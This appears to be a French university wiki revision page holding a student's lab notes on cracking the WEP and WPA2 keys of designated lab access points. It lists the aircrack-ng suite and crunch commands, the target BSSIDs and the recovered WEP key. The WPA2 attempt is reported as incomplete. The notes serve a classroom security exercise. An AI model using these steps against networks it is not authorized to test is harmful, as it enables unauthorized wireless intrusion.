« Atelier SysRes SE5 2023/2024 E4 » : différence entre les versions

De wiki-se.plil.fr
Aller à la navigation Aller à la recherche
Aucun résumé des modifications
 
(4 versions intermédiaires par le même utilisateur non affichées)
Ligne 1 : Ligne 1 :
Zabeth10
=Cibles=


cracotte13
cracotte13 et kracotte13 depuis la zabeth10.
 
=Craquage d'une clé WEP=


BSSID: 04:DA:D2:9C:50:5C
BSSID: 04:DA:D2:9C:50:5C


Lancement de l'écoute avec la commande : airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5C -w output wlan0
CH: 2
 
Lancement de l'écoute avec la commande : <syntaxhighlight lang="bash"> airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5C -w output wlan0 </syntaxhighlight>


[[Fichier:Data wep cracotte13.png]]
[[Fichier:Data wep cracotte13.png]]


Décryptage de la clé avec la commande : aircrack-ng --b 04:DA:D2:9C:50:5C output*.cap
Décryptage de la clé avec la commande : <syntaxhighlight lang="bash"> aircrack-ng --b 04:DA:D2:9C:50:5C output*.cap </syntaxhighlight>


[[Fichier:Key found cracotte13.png]]
[[Fichier:Key found cracotte13.png]]


La clé WEP: [ FF:FF:FF:FF:FA:BC:14:CB:AE:EE:EE:EE:EE ]


kracotte13
=Craquage d'une clé WPA2=


BSSID: 44:AD:D9:5F:87:0C
BSSID: 44:AD:D9:5F:87:0C
CH: 13
Génération du dictionnaire : <syntaxhighlight lang="bash"> crunch 8 8 0123456789 -o dico.txt </syntaxhighlight>
Lancement de l'écoute avec la commande : <syntaxhighlight lang="bash"> airodump-ng -c 13 --bssid 44:AD:D9:5F:87:0C -w output_wpa wlan0 </syntaxhighlight>
Résultats: trop peu de paquets ont été reçus, une écoute avec un plus grande quantité de paquets est necessaire pour décrypter la clé.

Version actuelle datée du 17 janvier 2024 à 22:23

Cibles

cracotte13 et kracotte13 depuis la zabeth10.

Craquage d'une clé WEP

BSSID: 04:DA:D2:9C:50:5C

CH: 2

Lancement de l'écoute avec la commande :

 airodump-ng -c 2 --bssid 04:DA:D2:9C:50:5C -w output wlan0

Data wep cracotte13.png

Décryptage de la clé avec la commande :

 aircrack-ng --b 04:DA:D2:9C:50:5C output*.cap

Key found cracotte13.png

La clé WEP: [ FF:FF:FF:FF:FA:BC:14:CB:AE:EE:EE:EE:EE ]

Craquage d'une clé WPA2

BSSID: 44:AD:D9:5F:87:0C

CH: 13

Génération du dictionnaire :

 crunch 8 8 0123456789 -o dico.txt

Lancement de l'écoute avec la commande :

 airodump-ng -c 13 --bssid 44:AD:D9:5F:87:0C -w output_wpa wlan0

Résultats: trop peu de paquets ont été reçus, une écoute avec un plus grande quantité de paquets est necessaire pour décrypter la clé.